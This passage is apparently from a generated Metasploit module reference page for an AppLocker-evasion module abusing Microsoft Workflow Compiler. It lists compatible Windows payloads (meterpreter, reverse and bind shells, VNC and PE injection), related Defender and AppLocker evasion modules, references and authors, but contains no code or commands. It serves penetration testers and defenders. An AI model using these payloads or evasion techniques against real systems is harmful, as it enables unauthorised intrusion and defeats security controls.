178 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
179 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
180 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
181 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
182 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
183 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
184 payload/windows/vncinject/find_tag normal No VNC Server (Reflective Injection), Find Tag Ordinal Stager
185 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
186 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
187 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
188 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
189 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
190 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
191 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
192 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
193 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
194 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
195 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
196 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
197 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
198 payload/windows/x64/exec normal No Windows x64 Execute Command
199 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
200 payload/windows/x64/messagebox normal No Windows MessageBox x64
201 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
202 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
203 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
204 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
205 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
206 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
207 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
208 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
209 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
210 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
211 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
212 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
213 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
214 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
215 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
216 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
217 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
218 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
219 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
220 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
221 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
222 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
223 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
224 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
225 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
226 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
227 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
228 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
229 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
230 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
231 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
232 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
233 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
234 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
235 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
236 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
237 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
238 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
239 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
240 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
241 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
242 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
243 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
244 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
245 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
246 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
247 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
248 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
249 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
250 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
251 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
252 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
253 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
254 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
255 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
256 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
257 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Related Pull Requests
References
- CVE: Not available
- https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb
See Also
Also check the following modules related to this module:
- evasion/windows/applocker_evasion_install_util
- evasion/windows/applocker_evasion_msbuild
- evasion/windows/applocker_evasion_presentationhost
- evasion/windows/applocker_evasion_regasm_regsvcs
- evasion/windows/process_herpaderping
- evasion/windows/syscall_inject
- evasion/windows/windows_defender_exe
- evasion/windows/windows_defender_js_hta
Authors
- Nick Tyrer <@NickTyrer>
- Matt Graeber
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.